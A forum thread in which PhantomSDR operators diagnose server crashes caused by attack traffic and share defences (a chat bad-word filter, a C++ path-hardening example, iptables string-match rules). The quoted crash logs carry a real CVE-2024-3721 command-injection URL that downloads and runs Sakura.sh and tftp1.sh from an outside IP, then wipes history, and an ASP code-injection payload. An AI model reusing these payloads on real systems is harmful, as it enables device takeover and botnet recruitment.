Hi
My instance crashes regularly with error:
terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
what(): filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.73%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.73+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]
To me it looks like some sort of attempted code injection attack. Does anyone have an idea how to prevent this?
I have not seen that yet, but below is the script (I assume).
#!/bin/bash
## sakura
## version 0.0.1 - initial
##################################################
sakura() {
    true
}
##################################################
if [ ${#} -eq 0 ]
then
    true
else
    exit 1 # wrong args
fi
##################################################
sakura
##################################################
## generated by create-stub2.sh v0.1.2
## on Fri, 28 Jun 2019 17:24:34 +0900
## see <https://github.com/temptemp3/sh2>
##################################################
https://github.com/temptemp3/sakura.sh/blob/master/sakura.sh
Yep, it's injection alright:
https://github.com/netsecfish/tbk_dvr_command_injection
More info here:
https://nvd.nist.gov/vuln/detail/CVE-2024-3721
I would check the IPs they come from and ban them.
They try to write and execute a file on your filesystem as far as I can see. But I doubt anything happens apart from a crash.
Check your drive for filenames you see in the command.
As far as I can see there is no file or anything like that on the drive. The IP is from the UK and I already reported it. Is there any way to prevent this kind of stuff from being entered into the system (they crash it daily with this)? Otherwise I'm just gonna remove the chatbox.
We can add some of the common extensions / commands to the bad word list. That should help.
You can add chmod, root, .sh, etc. to the chat.cpp file, then recompile the backend.
This will help:
Modify sendMessage() in App.svelte
function sendMessage() {
    newMessage = newMessage.replace(/[^\x00-\x7F]/g, ""); // Strips non-ASCII
    newMessage = stripText(newMessage);
    if (newMessage.trim() && username.trim()) {
        const messageObject = {
            cmd: "chat",
            message: newMessage.trim(),
            username: username,
        };
        socket.send(JSON.stringify(messageObject));
        newMessage = "";
        scrollToBottom();
    }
}
And add this function to App.svelte
function stripText(s) {
    let badStrings = ['777', 'chmod', '.sh', 'chown', 'tftp'];
    // Escape regex metacharacters so '.sh' matches a literal dot rather than any character
    let escaped = badStrings.map(b => b.replace(/[.*+?^${}()|[\]\\]/g, '\\$&'));
    let fixedStrings = new RegExp('\\b(' + escaped.join('|') + ')\\b', 'g');
    // The 'g' flag on the second replace collapses every run of spaces, not only the first
    return (s || '').replace(fixedStrings, '').replace(/[ ]{2,}/g, ' ');
}
I will add this to the current build now.
Hi Phil
Thanks for the code. Sorry, I had not much time the last weeks, but now I have tested it. It still has the same crash; some bad guys are trying to do this:
terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
what(): filesystem error: status: File name too long [//device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=uname%20-a;cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3B+wget+http%3A%2F%2F146.103.53.37%2FSakura.sh%3B+chmod+777+%2A%3B+sh+Sakura.sh%3B+tftp+-g+146.103.53.37+-r+tftp1.sh%3B+chmod+777+%2A%3B+sh+tftp1.sh%3B+rm+-rf+%2A.sh%3B+history+-c]
Any idea what I still could do?
Are you sure it's an injection?
As I found this:
https://github.com/azerothcore/azerothcore-wotlk/issues/6889#issuecomment-878552846
Describing the problem.
So question is...what OS etc are you running? Was it compiled with the suggested OS? And compilers?
We have seen more problems when people use something different than Ubuntu 22.04.
Why doesn't it happen to all others? And just you? It seems to come from device.rsp....could it be Soapy?
Not much info to go on besides you repeating the error but not telling us what you use: toml, start-stop script, etc.
You can reproduce it if you put any random stuff behind the URL, I found out:
http://sardinia-sdr.ddns.net/%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))
and it crashes with the error
terminate called after throwing an instance of 'std::filesystem::__cxx11::filesystem_error'
what(): filesystem error: status: File name too long [//%3C%%20If%20not%20isEmpty(Request(%20%22Data%22%20)%20)%20Then%20Dim%20fso,%20f%20'User%20input%20Data%20is%20written%20to%20a%20file%20named%20data.txt%20Set%20fso%20=%20CreateObject(%22Scripting.FileSystemObject%22)%20Set%20f%20=%20fso.OpenTextFile(Server.MapPath(%20%22data.txt%22%20),%208,%20True)%20f.Write%20Request(%22Data%22)%20&%20vbCrLf%20f.close%20Set%20f%20=%20nothing%20Set%20fso%20=%20Nothing%20'Data.txt%20is%20executed%20Server.Execute(%20%22data.txt%22%20)%20Else%20%%3E%20%3Cform%3E%20%3Cinput%20name=%22Data%22%20/%3E%3Cinput%20type=%22submit%22%20name=%22Enter%20Data%22%20/%3E%20%3C/form%3E%20%3C%%20End%20If%20%%3E)))]
This happens on any PhantomSDR instance I have, but somebody is penetrating sardinia-sdr.ddns.net.
Atm I have no idea how to prevent this from happening.
If you want to try it, just post the script from this page after a / behind the URL of your server and you will see it crashing:
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11-Testing_for_Code_Injection#:~:text=In%20Code%20Injection%20testing%2C%20a,%2C%20e.g.%2C%20ASP%20or%20PHP.
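Where the crash itself comes from, as an added example that is not PhantomSDR's own code: the error line names std::filesystem's status() together with "File name too long" (ENAMETOOLONG), i.e. the raw request path reached the throwing overload of status() and nothing caught the exception. The block below shows that pattern beside a hardened lookup that bounds the path, confines it to a web root and uses the error_code overload; the web root, the 1024-byte request limit and the function names are assumptions for this example.

```cpp
#include <algorithm>
#include <climits>
#include <filesystem>
#include <string>
#include <system_error>
#ifndef NAME_MAX
#define NAME_MAX 255   // POSIX default when <climits> does not expose it
#endif

namespace fs = std::filesystem;

// Crash-prone pattern: the throwing overload of status(). When the kernel
// answers ENAMETOOLONG (a component over NAME_MAX or a path over PATH_MAX),
// status() throws fs::filesystem_error instead of reporting "not found". With
// no handler on the request thread the exception reaches std::terminate(),
// which is the "terminate called after throwing..." line in this thread.
bool fileExistsThrowing(const fs::path& root, const std::string& urlPath) {
    return fs::is_regular_file(fs::status(root / urlPath.substr(1)));
}

// Reports whether the lookup above escapes as an exception for this URL path.
bool throwsForRequest(const fs::path& root, const std::string& urlPath) {
    try { fileExistsThrowing(root, urlPath); return false; }
    catch (const fs::filesystem_error&) { return true; }
}

enum class Lookup { Found, NotFound, Rejected };
constexpr std::size_t kMaxRequestPath = 1024;   // application limit chosen for this example

// Hardened pattern: bound the request, confine it to the web root, and use the
// error_code overload so any OS error becomes a 404, never an exception.
Lookup resolveRequest(const fs::path& root, const std::string& urlPath) {
    if (urlPath.empty() || urlPath[0] != '/' || urlPath.size() > kMaxRequestPath)
        return Lookup::Rejected;
    const fs::path rel(urlPath.substr(1));
    for (const fs::path& part : rel)             // a component over NAME_MAX can never exist
        if (part.string().size() > NAME_MAX) return Lookup::Rejected;
    // Lexical confinement. Note that "//device.rsp" yields an absolute rel, and
    // root / absolute discards root entirely, so the prefix test below catches it.
    // (A symlink inside the root pointing outside needs a separate, realpath-based check.)
    const fs::path full = (root / rel).lexically_normal();
    const fs::path normRoot = root.lexically_normal();
    auto mm = std::mismatch(normRoot.begin(), normRoot.end(), full.begin(), full.end());
    if (mm.first != normRoot.end()) return Lookup::Rejected;
    std::error_code ec;
    const fs::file_status st = fs::status(full, ec);
    if (ec || !fs::exists(st)) return Lookup::NotFound;   // ENOENT, ENAMETOOLONG, EACCES: all 404
    return Lookup::Found;
}
```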
Thanks for posting that Gianni. I will try to look further into that, but I believe Bas is far beyond me in finding a solution.
I have logged the issue:
*** longjmp causes uninitialized stack frame ***: terminate
OK, now to find the issue itself. I have some ideas... thanks for the data.
Not either....but I know the problem now.
The first sign of the string is %3C%, which equals '<', and that is injection code.
Ok, found a quick and dirty method to stop it from happening. As the first is always %3C%, we add this to the webserver start-script:
iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
Any URL that has %3C% in it will be blocked by the firewall. Maybe it needs tuning, but it works!!!! YES!!!!!
Beware, if you restart a lot, it adds the same line over and over.
To stop that from happening, put this before the adding-line:
iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
Then it removes it first, then adds.
Make sure that 'iptables -L' lists the line first!!! Else it may not work or be overruled.
Best to kill/delete UFW, it's sort of useless.
Thanks for your research Bas, but for me it's not working:
gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory
or with sudo:
gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).
Hi,
my Ubuntu 22.0.4
darko@buster:~$ sudo su
[sudo] lozinka za darko:
root@buster:/home/darko# iptables -A INPUT -m string --algo bm --string "%3C%" -j DROP
root@buster:/home/darko# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP all -- anywhere anywhere STRING match "%3C%" ALGO name bm TO 65535
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@buster:/home/darko#
and LMDE 6
root@Siemens:/home/websdr# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
DROP all -- anywhere anywhere STRING match "%3C%" ALGO name bm
Chain FORWARD (policy ACCEPT)
target prot opt source destination
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
root@Siemens:/home/websdr#
Is this OK? :)
Quote from: hb3xdc on May 26, 2025, 10:35 PM
Thanks for your research Bas, but for me it's not working:
gianni@sdr-srv02:~$ iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables v1.8.7 (nf_tables): Couldn't load match `string':No such file or directory
or with sudo:
gianni@sdr-srv02:~$ sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
iptables: Bad rule (does a matching rule exist in that chain?).
Just remove the deletion entry from your iptables script. It is trying to delete an entry that does not yet exist.
sudo iptables -D INPUT -m string --algo bm --string "%3C%" -j DROP
Linux has a nice option: man command
To know iptables and what it does, type: man iptables
It will tell you what everything does.
Quote from: Bas ON5HB on May 27, 2025, 01:00 PM
Linux has a nice option: man command
To know iptables and what it does, type: man iptables
It will tell you what everything does.
Thanks,
I know that but there are people who don't.
Old Linux/Unix masters used to answer similar questions with the acronym RTFM.
I guarantee, that acronym ALWAYS HELPS! ;)
Best regards,
Darko, 9a7aof
And they managed again... different line... so I adapted the iptables:
iptables -D INPUT -m string --algo kmp --string "%3C%" -j DROP
iptables -D INPUT -m string --algo kmp --string "device.rsp" -j DROP
iptables -A INPUT -m string --algo kmp --string "%3C%" -j DROP
iptables -A INPUT -m string --algo kmp --string "device.rsp" -j DROP
As they attack the device.rsp all the time, I added that too.
Also replaced the algo with KMP, as KMP can scan over multiple TCP packets, where BM may miss it.
Hopefully it's over now.